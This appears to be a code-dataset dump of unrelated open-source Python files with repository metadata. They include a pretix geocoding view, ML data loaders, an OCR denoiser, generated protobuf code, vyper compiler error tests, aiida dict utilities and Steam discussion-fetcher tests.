# if accuracy < ModelAccuracy.CIFAR10_CNN.value:
# assert 0, 'Check Accuracy'
if __name__ == "__main__":
print("cifar10 cnn")
top_level_task()
| 30.957143 | 167 | 0.760037 |
a69fb6b4fa82c626ecffa034c6b7149eca785a14 | 3,685 | py | Python | src/pretix/control/views/geo.py | fabm3n/pretix | 520fb620888d5c434665a6a4a33cb2ab22dd42c7 | [
"Apache-2.0"
] | 1,248 | 2015-04-24T13:32:06.000Z | 2022-03-29T07:01:36.000Z | src/pretix/control/views/geo.py | fabm3n/pretix | 520fb620888d5c434665a6a4a33cb2ab22dd42c7 | [
"Apache-2.0"
] | 2,113 | 2015-02-18T18:58:16.000Z | 2022-03-31T11:12:32.000Z | src/pretix/control/views/geo.py | fabm3n/pretix | 520fb620888d5c434665a6a4a33cb2ab22dd42c7 | [
"Apache-2.0"
] | 453 | 2015-05-13T09:29:06.000Z | 2022-03-24T13:39:16.000Z | #
# This file is part of pretix (Community Edition).
#
# Copyright (C) 2014-2020 Raphael Michel and contributors
# Copyright (C) 2020-2021 rami.io GmbH and contributors
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General
# Public License as published by the Free Software Foundation in version 3 of the License.
#
# ADDITIONAL TERMS APPLY: Pursuant to Section 7 of the GNU Affero General Public License, additional terms are
# applicable granting you additional permissions and placing additional restrictions on your usage of this software.
# Please refer to the pretix LICENSE file to obtain the full terms applicable to this work. If you did not receive
# this file, see <https://pretix.eu/about/en/license>.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License along with this program. If not, see
# <https://www.gnu.org/licenses/>.
#
import logging
from urllib.parse import quote
import requests
from django.contrib.auth.mixins import LoginRequiredMixin
from django.core.cache import cache
from django.http import JsonResponse
from django.views.generic.base import View
from pretix.base.settings import GlobalSettingsObject
logger = logging.getLogger(__name__)
class GeoCodeView(LoginRequiredMixin, View):
def get(self, request, *args, **kwargs):
q = self.request.GET.get('q')
cd = cache.get('geocode:{}'.format(q))
if cd:
return JsonResponse({
'success': True,
'results': cd
}, status=200)
gs = GlobalSettingsObject()
try:
if gs.settings.opencagedata_apikey:
res = self._use_opencage(q)
elif gs.settings.mapquest_apikey:
res = self._use_mapquest(q)
else:
return JsonResponse({
'success': False,
'results': []
}, status=200)
except IOError:
logger.exception("Geocoding failed")
return JsonResponse({
'success': False,
'results': []
}, status=200)
cache.set('geocode:{}'.format(q), res, timeout=3600 * 6)
return JsonResponse({
'success': True,
'results': res
}, status=200)
def _use_opencage(self, q):
gs = GlobalSettingsObject()
r = requests.get(
'https://api.opencagedata.com/geocode/v1/json?q={}&key={}'.format(
quote(q), gs.settings.opencagedata_apikey
)
)
r.raise_for_status()
d = r.json()
res = [
{
'formatted': r['formatted'],
'lat': r['geometry']['lat'],
'lon': r['geometry']['lng'],
} for r in d['results']
]
return res
def _use_mapquest(self, q):
gs = GlobalSettingsObject()
r = requests.get(
'https://www.mapquestapi.com/geocoding/v1/address?location={}&key={}'.format(
quote(q), gs.settings.mapquest_apikey
)
)
r.raise_for_status()
d = r.json()
res = [
{
'formatted': q,
'lat': r['locations'][0]['latLng']['lat'],
'lon': r['locations'][0]['latLng']['lng'],
} for r in d['results']
]
return res
| 34.439252 | 118 | 0.59403 |
e0dc4f835734d7ee6335cf3f669e2b6a13c04e98 | 2,327 | py | Python | project_utils.py | KieranXWang/HRS | 3999cd036ee9da59f4d82619bd540e93d5258f7c | [
"MIT"
] | 5 | 2019-09-05T15:18:52.000Z | 2022-03-28T08:15:47.000Z | project_utils.py | VictoriaWSY/HRS | eb7061e225b3e647dc266a91fc473e0d98f3ea4e | [
"MIT"
] | 1 | 2021-07-26T13:05:49.000Z | 2021-07-26T13:05:49.000Z | project_utils.py | VictoriaWSY/HRS | eb7061e225b3e647dc266a91fc473e0d98f3ea4e | [
"MIT"
] | 6 | 2019-09-18T02:11:12.000Z | 2022-03-11T08:45:03.000Z | import numpy as np
from keras.datasets import cifar10, mnist
from keras.utils import np_utils
def load_cifar_data(one_hot=True, scale1=True):
(X_train, Y_train), (X_test, Y_test) = cifar10.load_data()
if one_hot:
Y_train = np_utils.to_categorical(Y_train, 10)
Y_test = np_utils.to_categorical(Y_test, 10)
else:
Y_train = np.reshape(Y_train, (Y_train.shape[0],))
Y_test = np.reshape(Y_test, (Y_test.shape[0],))
if scale1:
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
return X_train, X_test, Y_train, Y_test
def load_mnist_data(one_hot=True, scale1=True):
# the defualt is 0-255, not one hot coding
(X_train, Y_train), (X_test, Y_test) = mnist.load_data()
# reshape
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], X_train.shape[2], 1))
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], X_test.shape[2], 1))
if one_hot:
Y_train = np_utils.to_categorical(Y_train, 10)
Y_test = np_utils.to_categorical(Y_test, 10)
if scale1:
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
return X_train, X_test, Y_train, Y_test
def get_data(dataset, scale1=True, one_hot=False, percentage=None):
if dataset == 'CIFAR':
[X_train, X_test, Y_train, Y_test] = load_cifar_data(scale1=scale1, one_hot=one_hot)
if percentage:
samples = X_train.shape[0]
use_samples = int(samples * percentage)
X_train = X_train[0:use_samples]
Y_train = Y_train[0:use_samples]
elif dataset == 'MNIST':
[X_train, X_test, Y_train, Y_test] = load_mnist_data(scale1=scale1, one_hot=one_hot)
if percentage:
samples = X_train.shape[0]
use_samples = int(samples * percentage)
X_train = X_train[0:use_samples]
Y_train = Y_train[0:use_samples]
return [X_train, X_test, Y_train, Y_test]
def get_dimensions(dataset):
'''
Args:
dataset: CIFAR or MNIST
Returns: [height, width, channels]
'''
if dataset == 'CIFAR':
return [32,32,3]
elif dataset == 'MNIST':
return [28,28,1]
| 28.728395 | 92 | 0.628706 |
3e4c82fa2f273b6624e4f2d09c2b801124c54aae | 2,500 | py | Python | zvt/factors/similarity_factor.py | stone64/zvt | 19360b3f29992bc759709adfa90e32843147a807 | [
"MIT"
] | 1 | 2021-02-25T08:41:51.000Z | 2021-02-25T08:41:51.000Z | zvt/factors/similarity_factor.py | stone64/zvt | 19360b3f29992bc759709adfa90e32843147a807 | [
"MIT"
] | null | null | null | zvt/factors/similarity_factor.py | stone64/zvt | 19360b3f29992bc759709adfa90e32843147a807 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from typing import List, Union
import numpy as np
import pandas as pd
from zvt.api import AdjustType, get_kdata, get_kdata_schema
from zvt.contract import EntityMixin, IntervalLevel
from zvt.domain import Stock
from zvt.factors import TechnicalFactor, Transformer, Accumulator
def get_ref_vector(entity_id, end, window=100, level=IntervalLevel.LEVEL_1DAY, entity_schema=Stock):
data_schema = get_kdata_schema(entity_schema.__name__, level=level)
df = get_kdata(entity_id=entity_id, level=level, end_timestamp=end, order=data_schema.timestamp.desc(),
limit=window,
columns=['close', 'volume'])
exp_data = np.zeros((window, 2))
exp_data[:, 0] = df['close']
exp_data[:, 1] = df['volume']
return exp_data
class SimilarityFactor(TechnicalFactor):
def __init__(self, entity_schema: EntityMixin = Stock, provider: str = None, entity_provider: str = None,
entity_ids: List[str] = None, exchanges: List[str] = None, codes: List[str] = None,
the_timestamp: Union[str, pd.Timestamp] = None, start_timestamp: Union[str, pd.Timestamp] = None,
end_timestamp: Union[str, pd.Timestamp] = None,
columns: List = ['id', 'entity_id', 'timestamp', 'level', 'open', 'close', 'high', 'low'],
filters: List = None, order: object = None, limit: int = None,
level: Union[str, IntervalLevel] = IntervalLevel.LEVEL_1DAY, category_field: str = 'entity_id',
time_field: str = 'timestamp', computing_window: int = None, keep_all_timestamp: bool = False,
fill_method: str = 'ffill', effective_number: int = None, transformer: Transformer = None,
accumulator: Accumulator = None, need_persist: bool = False, dry_run: bool = False,
adjust_type: Union[AdjustType, str] = None, entity_id='stock_sz_000338', end='2020-01-01',
window=100) -> None:
self.ref_vector = get_ref_vector(entity_id=entity_id, end=end, window=window)
super().__init__(entity_schema, provider, entity_provider, entity_ids, exchanges, codes, the_timestamp,
start_timestamp, end_timestamp, columns, filters, order, limit, level, category_field,
time_field, computing_window, keep_all_timestamp, fill_method, effective_number, transformer,
accumulator, need_persist, dry_run, adjust_type)
| 54.347826 | 118 | 0.6592 |
9b531db7c6e6b8fea84b02e97414e77dda5a2a51 | 4,572 | py | Python | ocr/utils/denoiser_utils.py | georgeblu1/Logia | 8a38ae3fd68fb6f4149f0ac7df804e3eb0bcf5d7 | [
"MIT"
] | null | null | null | ocr/utils/denoiser_utils.py | georgeblu1/Logia | 8a38ae3fd68fb6f4149f0ac7df804e3eb0bcf5d7 | [
"MIT"
] | 8 | 2020-03-24T17:17:06.000Z | 2022-03-11T23:53:25.000Z | ocr/utils/denoiser_utils.py | georgeblu1/Logia | 8a38ae3fd68fb6f4149f0ac7df804e3eb0bcf5d7 | [
"MIT"
] | null | null | null | import gluonnlp as nlp
import Levenshtein
import mxnet as mx
import numpy as np
from ocr.utils.encoder_decoder import decode_char
class SequenceGenerator:
def __init__(self, sampler, language_model, vocab, ctx_nlp, tokenizer=nlp.data.SacreMosesTokenizer(), detokenizer=nlp.data.SacreMosesDetokenizer()):
self.sampler = sampler
self.language_model = language_model
self.ctx_nlp = ctx_nlp
self.vocab = vocab
self.tokenizer = tokenizer
self.detokenizer = detokenizer
def generate_sequences(self, inputs, begin_states, sentence):
samples, scores, valid_lengths = self.sampler(inputs, begin_states)
samples = samples[0].asnumpy()
scores = scores[0].asnumpy()
valid_lengths = valid_lengths[0].asnumpy()
max_score = -10e20
# Heuristic #1
#If the sentence is correct, let's not try to change it
sentence_tokenized = [i.replace(""", '"').replace("'","'").replace("&", "&") for i in self.tokenizer(sentence)]
sentence_correct = True
for token in sentence_tokenized:
if (token not in self.vocab or self.vocab[token] > 400000) and token.lower() not in ["don't", "doesn't", "can't", "won't", "ain't", "couldn't", "i'd", "you'd", "he's", "she's", "it's", "i've", "you've", "she'd"]:
sentence_correct = False
break
if sentence_correct:
return sentence
# Heuristic #2
# We want sentence that have the most in-vocabulary words
# and we penalize sentences that have out of vocabulary words
# that do not start with a capital letter
for i, sample in enumerate(samples):
tokens = decode_char(sample[:valid_lengths[i]])
tokens = [i.replace(""", '"').replace("'","'").replace("&", "&") for i in self.tokenizer(tokens)]
score = 0
for t in tokens:
# Boosting names
if (t in self.vocab and self.vocab[t] < 450000) or (len(t) > 0 and t.istitle()):
score += 0
else:
score -= 1
score -= 0
if score == max_score:
max_score = score
best_tokens.append(tokens)
elif score > max_score:
max_score = score
best_tokens = [tokens]
# Heurisitic #3
# Smallest edit distance
# We then take the sentence with the lowest edit distance
# From the predicted original sentence
best_dist = 1000
output_tokens = best_tokens[0]
best_tokens_ = []
for tokens in best_tokens:
dist = leven.levenshtein(sentence, ' '.join(self.detokenizer(tokens)))
if dist < best_dist:
best_dist = dist
best_tokens_ =[tokens]
elif dist == best_dist:
best_tokens_.append(tokens)
# Heuristic #4
# We take the sentence with the smallest number of tokens
# to avoid split up composed words
min_len = 10e20
for tokens in best_tokens_:
if len(tokens) < min_len:
min_len = len(tokens)
best_tokens__ = [tokens]
elif len(tokens) == min_len:
best_tokens__.append(tokens)
# Heuristic #5
# Lowest ppl
# If we still have ties we take the sentence with the lowest
# Perplexity score according to the language model
best_ppl = 10e20
for tokens in best_tokens__:
if len(tokens) > 1:
inputs = self.vocab[tokens]
hidden = self.language_model.begin_state(batch_size=1, func=mx.nd.zeros, ctx=self.ctx_nlp)
output, _ = self.language_model(mx.nd.array(inputs).expand_dims(axis=1).as_in_context(self.ctx_nlp), hidden)
output = output.softmax()
l = 0
for i in range(1, len(inputs)):
l += -output[i-1][0][inputs[i]].log()
ppl = (l/len(inputs)).exp()
if ppl < best_ppl:
output_tokens = tokens
best_ppl = ppl
output = ' '.join(self.detokenizer(output_tokens))
# Heuristic #6
# Sometimes there are artefact at the end of the corrected sentence
# We cut the end of the sentence
if len(output) > len(sentence) + 10:
output = output[:len(sentence)+2]
return output | 41.189189 | 224 | 0.566273 |
04966c67237f3424e389b5e61b569f254418acb2 | 5,091 | py | Python | pyatv/mrp/protobuf/NowPlayingClient_pb2.py | acheronfail/pyatv | 9cb96ffcc49938c4b43c92b7b40ddcecae37e732 | [
"MIT"
] | null | null | null | pyatv/mrp/protobuf/NowPlayingClient_pb2.py | acheronfail/pyatv | 9cb96ffcc49938c4b43c92b7b40ddcecae37e732 | [
"MIT"
] | null | null | null | pyatv/mrp/protobuf/NowPlayingClient_pb2.py | acheronfail/pyatv | 9cb96ffcc49938c4b43c92b7b40ddcecae37e732 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: pyatv/mrp/protobuf/NowPlayingClient.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='pyatv/mrp/protobuf/NowPlayingClient.proto',
package='',
syntax='proto2',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n)pyatv/mrp/protobuf/NowPlayingClient.proto\"\xe8\x01\n\x10NowPlayingClient\x12\x19\n\x11processIdentifier\x18\x01 \x01(\x05\x12\x18\n\x10\x62undleIdentifier\x18\x02 \x01(\t\x12)\n!parentApplicationBundleIdentifier\x18\x03 \x01(\t\x12\x1d\n\x15processUserIdentifier\x18\x04 \x01(\x05\x12\x1c\n\x14nowPlayingVisibility\x18\x05 \x01(\x05\x12\x13\n\x0b\x64isplayName\x18\x07 \x01(\t\x12\"\n\x1a\x62undleIdentifierHierarchys\x18\x08 \x03(\t'
)
_NOWPLAYINGCLIENT = _descriptor.Descriptor(
name='NowPlayingClient',
full_name='NowPlayingClient',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='processIdentifier', full_name='NowPlayingClient.processIdentifier', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bundleIdentifier', full_name='NowPlayingClient.bundleIdentifier', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parentApplicationBundleIdentifier', full_name='NowPlayingClient.parentApplicationBundleIdentifier', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='processUserIdentifier', full_name='NowPlayingClient.processUserIdentifier', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='nowPlayingVisibility', full_name='NowPlayingClient.nowPlayingVisibility', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='displayName', full_name='NowPlayingClient.displayName', index=5,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bundleIdentifierHierarchys', full_name='NowPlayingClient.bundleIdentifierHierarchys', index=6,
number=8, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=46,
serialized_end=278,
)
DESCRIPTOR.message_types_by_name['NowPlayingClient'] = _NOWPLAYINGCLIENT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
NowPlayingClient = _reflection.GeneratedProtocolMessageType('NowPlayingClient', (_message.Message,), {
'DESCRIPTOR' : _NOWPLAYINGCLIENT,
'__module__' : 'pyatv.mrp.protobuf.NowPlayingClient_pb2'
# @@protoc_insertion_point(class_scope:NowPlayingClient)
})
_sym_db.RegisterMessage(NowPlayingClient)
# @@protoc_insertion_point(module_scope)
| 45.053097 | 456 | 0.768022 |
f3b25970ad94fed4000e50ef02b27e02db993edc | 1,303 | py | Python | tests/parser/exceptions/test_variable_declaration_exception.py | williamremor/vyper | 4d33dc4140f7d0c339876afb6af7b417bd0ed8e0 | [
"MIT"
] | 1 | 2018-08-31T02:32:57.000Z | 2018-08-31T02:32:57.000Z | tests/parser/exceptions/test_variable_declaration_exception.py | williamremor/vyper | 4d33dc4140f7d0c339876afb6af7b417bd0ed8e0 | [
"MIT"
] | null | null | null | tests/parser/exceptions/test_variable_declaration_exception.py | williamremor/vyper | 4d33dc4140f7d0c339876afb6af7b417bd0ed8e0 | [
"MIT"
] | null | null | null | import pytest
from pytest import raises
from vyper import compiler
from vyper.exceptions import VariableDeclarationException
fail_list = [
"""
x: num
x: num
""",
"""
x: num
@public
def foo(x: num): pass
""",
"""
@public
def foo(x: num, x: num): pass
""",
"""
@public
def foo(num: num):
pass
""",
"""
@public
def foo():
x = 5
x: num
""",
"""
@public
def foo():
x: num
x: num
""",
"""
@public
def foo():
x: num
@public
def foo():
y: num
""",
"""
@public
def foo():
num = 5
""",
"""
@public
def foo():
bork = zork
""",
"""
x: num
@public
def foo():
x = 5
""",
"""
b: num
@public
def foo():
b = 7
""",
"""
x: wei_value
@public
def foo():
send(0x1234567890123456789012345678901234567890, x)
""",
"""
@public
def foo():
true = 3
""",
"""
@public
def foo():
self.goo()
@public
def goo():
self.foo()
""",
"""
@public
def foo():
BALANCE = 45
""",
"""
num: num
""",
"""
foo: num
@public
def foo():
pass
""",
]
@pytest.mark.parametrize('bad_code', fail_list)
def test_variable_decleration_exception(bad_code):
with raises(VariableDeclarationException):
compiler.compile(bad_code)
| 11.429825 | 57 | 0.504221 |
dbdc8d7ebd84f6d221cfd7cc1892af5d102ab039 | 2,660 | py | Python | aiida_vasp/utils/extended_dicts.py | kavanase/aiida-vasp | 3941447b398f2da1ff7ffd3f3a22e18a7f7252fc | [
"MIT"
] | 1 | 2021-06-13T09:13:01.000Z | 2021-06-13T09:13:01.000Z | aiida_vasp/utils/extended_dicts.py | pzarabadip/aiida-vasp | f9edc032fb0845622c5b0bbe7e1a5bf51205dae5 | [
"MIT"
] | null | null | null | aiida_vasp/utils/extended_dicts.py | pzarabadip/aiida-vasp | f9edc032fb0845622c5b0bbe7e1a5bf51205dae5 | [
"MIT"
] | null | null | null | """
Extensions of dictionaries.
---------------------------
Extensions of Pythons standard dict as well as Aiida's AttributeDict.
"""
import collections
from copy import deepcopy
from aiida.common.extendeddicts import AttributeDict
class DictWithAttributes(AttributeDict):
"""
Extension of the AttributeDict from Aiida.common.
This class internally stores values in a dictionary, but exposes
the keys also as attributes, i.e. asking for attrdict.key
will return the value of attrdict['key'] and so on.
If the key is not in the dict a default value will be returned.
"""
def __getattr__(self, attr):
"""Read a key as an attribute. Return a Default value on missing key."""
return self.get(attr)
def __setattr__(self, attr, value):
"""Set a key as an attribute."""
self[attr] = value
def delete_keys_from_dict(dictionary, keys):
"""
Delete a key from a nested dictionary.
Extended to support somekey.someotherkey in case we need some restrictions on the nesting.
"""
if not isinstance(keys, list):
keylist = [keys]
else:
keylist = keys
for key in keylist:
nested_keys = key.strip().split('.')
delete_nested_key(dictionary, nested_keys)
def delete_nested_key(dictionary, keys):
"""Delete the dictionary entry corresponding to a nested hierarchy of keys."""
from collections.abc import MutableMapping # pylint: disable=import-outside-toplevel
from contextlib import suppress # pylint: disable=import-outside-toplevel
if keys and dictionary:
element = keys[0]
if element:
value = dictionary.get(element)
if len(keys) == 1:
with suppress(KeyError):
del dictionary[element]
else:
if isinstance(value, MutableMapping):
delete_nested_key(value, keys[1:])
def update_nested_dict(dict1, dict2):
"""Updated a nested dictionary, where dict1 is updated with values in dict2."""
for key, value in dict2.items():
dict1_value = dict1.get(key)
if isinstance(value, collections.Mapping) and isinstance(dict1_value, collections.Mapping):
update_nested_dict(dict1_value, value)
else:
dict1[key] = deepcopy(value)
def find_key_in_dicts(dictionary, supplied_key):
"""Find a key in a nested dictionary."""
for key, value in dictionary.items():
if key == supplied_key:
yield value
elif isinstance(value, dict):
for result in find_key_in_dicts(value, supplied_key):
yield result
| 32.439024 | 99 | 0.652256 |
88239a31c70435ee71c85a1dcd64de7e75c9ad3f | 47 | py | Python | irctest/scram/__init__.py | FiskFan1999/ergochat_irctest | da005d7d2492bf31c4bdeb46108240766c69d0ad | [
"MIT"
] | 16 | 2015-12-20T16:24:54.000Z | 2021-06-03T18:00:03.000Z | irctest/scram/__init__.py | FiskFan1999/ergochat_irctest | da005d7d2492bf31c4bdeb46108240766c69d0ad | [
"MIT"
] | 66 | 2015-12-20T00:23:25.000Z | 2021-08-14T09:57:04.000Z | irctest/scram/__init__.py | FiskFan1999/ergochat_irctest | da005d7d2492bf31c4bdeb46108240766c69d0ad | [
"MIT"
] | 3 | 2021-12-04T21:18:41.000Z | 2022-03-22T01:42:36.000Z | from .scram import *
from .exceptions import *
| 15.666667 | 25 | 0.744681 |
771265915f53a909345a44e4ad5aa0615d77e60e | 8,939 | py | Python | tests/fetchers/test_discussion_fetcher.py | nightblade9/steam-review-checker | bfcc9c6ec93ab8a472cfd75e22ef33167c4dc3f9 | [
"MIT"
] | null | null | null | tests/fetchers/test_discussion_fetcher.py | nightblade9/steam-review-checker | bfcc9c6ec93ab8a472cfd75e22ef33167c4dc3f9 | [
"MIT"
] | 2 | 2021-05-27T15:50:46.000Z | 2021-10-31T23:01:58.000Z | tests/fetchers/test_discussion_fetcher.py | nightblade9/steam-review-checker | bfcc9c6ec93ab8a472cfd75e22ef33167c4dc3f9 | [
"MIT"
] | 2 | 2021-02-14T07:34:47.000Z | 2021-05-27T15:20:57.000Z | import datetime
import os
import unittest
from fetchers import discussion_fetcher
class TestDicussionFetcher(unittest.TestCase):
_MAX_DISCUSSIONS_PER_PAGE = 50 # use proper pagination please
def test_parse_date_converts_empty_string_to_now(self):
for test_case in ['', ' ']:
actual = discussion_fetcher._parse_date(test_case)
now = datetime.datetime.now()
self.assertEqual(actual.year, now.year)
self.assertEqual(actual.month, now.month)
self.assertEqual(actual.day, now.day)
self.assertEqual(actual.hour, now.hour)
self.assertEqual(actual.min, now.min)
def test_parse_date_converts_just_now_to_now(self):
for test_case in ["just NOW", "Just now", "JuSt NoW"]:
actual = discussion_fetcher._parse_date(test_case)
now = datetime.datetime.now()
self.assertEqual(actual.year, now.year)
self.assertEqual(actual.month, now.month)
self.assertEqual(actual.day, now.day)
self.assertEqual(actual.hour, now.hour)
self.assertEqual(actual.min, now.min)
def test_parse_date_converts_minutes_ago_to_now_with_delta(self):
for test_case in [8, 38, 1, 59]:
actual = discussion_fetcher._parse_date("{} minutes ago".format(test_case))
expected = datetime.datetime.now() + datetime.timedelta(minutes = test_case)
self.assertEqual(actual.year, expected.year)
self.assertEqual(actual.month, expected.month)
self.assertEqual(actual.day, expected.day)
self.assertTrue(actual.hour == expected.hour or actual.hour == expected.hour + 1)
self.assertEqual(actual.min, expected.min)
def test_parse_date_converts_hours_ago_to_now_with_delta(self):
for test_case in [17, 6, 1, 23]:
actual = discussion_fetcher._parse_date("{} hours ago".format(test_case))
expected = datetime.datetime.now() + datetime.timedelta(hours = test_case)
self.assertEqual(actual.year, expected.year)
self.assertEqual(actual.month, expected.month)
self.assertTrue(actual.day == expected.day or actual.day == expected.day + 1)
# Hour is too tricky to assert with rollover
self.assertEqual(actual.min, expected.min)
def test_parse_date_converts_yearless_dates_to_current_year(self):
for data in ["May 29", "Jan 1", "Dec 31", "Feb 28", "Aug 17"]:
test_case = "{} @ 9:00am".format(data)
expected = datetime.datetime.strptime(test_case, "%b %d @ %I:%M%p")
actual = discussion_fetcher._parse_date(test_case)
self.assertEqual(actual.year, datetime.datetime.now().year)
self.assertEqual(actual.month, expected.month),
self.assertEqual(actual.day, expected.day, "Failed for {}: ex={} act={}".format(test_case, expected, actual))
def test_parse_date_parses_date_with_year(self):
for data in ["Jun 29, 2021", "Jan 1, 2002", "Dec 31, 1976", "Mar 16, 2015", "Oct 4, 2011"]:
test_case = "{} @ 1:00am".format(data)
expected = datetime.datetime.strptime(test_case, "%b %d, %Y @ %I:%M%p")
actual = discussion_fetcher._parse_date(test_case)
self.assertEqual(actual.year, expected.year)
self.assertEqual(actual.month, expected.month, "Failed for {}: ex={} act={}".format(test_case, expected, actual))
self.assertEqual(actual.day, expected.day)
# For Oneons: detailed parsing for the first discussion; check ALL fields.
def test_parse_discussions_can_parse_oneons_discussions(self):
raw_html = ""
app_id = 1342600
with open(os.path.join("tests", "test_data", "steam_discussions", "2021", "{}.html".format(app_id)), 'r', encoding="utf-8") as file_handle:
raw_html = file_handle.read()
expected_discussions = 3
actuals = discussion_fetcher._parse_discussions(raw_html, app_id, "Oneons")
self.assertEqual(expected_discussions, len(actuals))
discussion = actuals[-1]
self.assertEqual(app_id, discussion["app_id"])
self.assertEqual("A few Suggestions", discussion["title"])
self.assertEqual("Benjo Kabobble", discussion["author"])
self.assertEqual("https://steamcommunity.com/app/1342600/discussions/0/2646378342121880438/", discussion["url"])
self.assertEqual(2, int(discussion["num_replies"]))
self.assertEqual("Oneons", discussion["game_name"])
# Make sure we get "PINNED: <title>" discussions correctly, via Feudal Kingdoms
def test_parse_discussions_gets_title_for_pinned_discussions(self):
# Arrange
raw_html = ""
app_id = 1349900
for data_directory in [2020, 2021]:
with open(os.path.join("tests", "test_data", "steam_discussions", str(data_directory), "{}.html".format(app_id)), 'r', encoding="utf-8") as file_handle:
raw_html = file_handle.read()
# Act
actual = discussion_fetcher._parse_discussions(raw_html, app_id, "Feudal Kingdoms")
# Assert
expected_titles = [
"PINNED: Feudal Kingdoms Early Access Release postponed",
"PINNED: Feedback",
"PINNED: Bugs",
"PINNED: Support",
"Dead",
"game delayed"
]
self.assertEqual(len(expected_titles), len(actual))
for i in range(len(expected_titles)):
expected_title = expected_titles[i]
actual_discussion = actual[i]
self.assertEqual(expected_title, actual_discussion["title"])
# For other games: discussion count is sufficient.
def test_parse_discussions_can_parse_up_to_max_discussions(self):
test_cases = {
"2020": [
{
"game_name": "Clam Man",
"app_id": 1000640,
"expected": 11
},
{
"game_name": "Pixelot",
"app_id": 1512860,
"expected": 12
},
{
"game_name": "Cursed: Gems 2",
"app_id": 643960,
"expected": 15 # max used when we grabbed this file
},
{
# BioMutant: page 1 ("8 minutes ago" and "Just now")
"game_name": "BioMutant Page 1",
"app_id": "597820-page1",
"expected": 15 # max used when we grabbed this file
},
{
"game_name": "BioMutant Last Page",
"app_id": "597820-page31",
"expected": 15 # max used when we grabbed this file
}
],
"2021": [
{
"game_name": "Clam Man",
"app_id": 1000640,
"expected": 12
},
{
"game_name": "Pixelot",
"app_id": 1512860,
"expected": 13
},
{
"game_name": "Cursed: Gems 2",
"app_id": 643960,
"expected": TestDicussionFetcher._MAX_DISCUSSIONS_PER_PAGE # max
},
{
# BioMutant: page 1 ("8 minutes ago" and "Just now")
"game_name": "BioMutant Page 1",
"app_id": "597820-page1",
"expected": TestDicussionFetcher._MAX_DISCUSSIONS_PER_PAGE # max
},
{
"game_name": "BioMutant Last Page",
"app_id": "597820-lastpage",
"expected": 26
}
]
}
for data_directory in ["2020", "2021"]:
for data in test_cases[data_directory]:
raw_html = ""
app_id = data["app_id"]
expected = data["expected"]
with open(os.path.join("tests", "test_data", "steam_discussions", data_directory, "{}.html".format(app_id)), 'r', encoding="utf-8") as file_handle:
raw_html = file_handle.read()
actual = discussion_fetcher._parse_discussions(raw_html, app_id, "Title goes here")
self.assertEqual(expected, len(actual), "Failed with {} data on {}".format(data_directory, app_id)) # maxes out at 15 discussions | 46.801047 | 165 | 0.547824 |
a6477b04ee0f1f2f55f06c5ffb636835b4dbe951 | 386 | py | Python | .venv/lib/python3.8/site-packages/aws_cdk/aws_kms/_jsii/__init__.py | sandipganguly/cdkpipeline | aecde04724a99e55d20a62cd3ccded6ceedbe967 | [
"MIT-0"
] | null | null | null | .venv/lib/python3.8/site-packages/aws_cdk/aws_kms/_jsii/__init__.py | sandipganguly/cdkpipeline | aecde04724a99e55d20a62cd3ccded6ceedbe967 | [
"MIT-0"
] | null | null | null | .venv/lib/python3.8/site-packages/aws_cdk/aws_kms/_jsii/__init__.py | sandipganguly/cdkpipeline | aecde04724a99e55d20a62cd3ccded6ceedbe967 | [
"MIT-0"
] | null | null | null | import abc
import builtins
import datetime
import enum
import typing
import jsii
import jsii.compat
import publication
